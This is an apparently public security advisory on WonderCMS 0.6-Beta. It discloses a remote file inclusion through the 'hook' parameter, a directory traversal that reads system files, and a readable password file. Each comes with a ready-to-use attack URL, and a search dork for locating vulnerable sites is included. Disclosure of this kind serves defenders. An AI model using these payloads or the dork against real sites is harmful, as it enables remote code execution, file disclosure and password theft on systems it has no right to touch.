Wonder CMS 0.6-Beta File Inclusion / Traversal / Disclosure

Published
Credit
Risk
2015.06.19
indoushka
Medium
CWE
CVE
Local
Remote
CWE-22
N/A
No
Yes

| # Title : WonderCMS 0.6-Beta Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : ?2015 Your website | Powered by WonderCMS | Login
| # Tested on: windows 8.1 Franais V.(Pro)
| # Download : http://wondercms.com/
=======================================

File inclusion :

Line 17 : <?php if(isset($_REQUEST['hook']))include($_REQUEST['hook']); ?>

http://127.0.0.1/wondercms/js/editInplace.php?hook=http://127.0.0.1/evil.php

Directory traversal :

Line 17 : if(changing)return;

http://127.0.0.1//wondercms/js/editInplace.php?hook=../../../../../../../../../../windows/win.ini

Password Disclosure :

http://127.0.0.1/wondercms/files/password

Greetz :
jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net
---------------------------------------------------------------------------------------------------------------


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com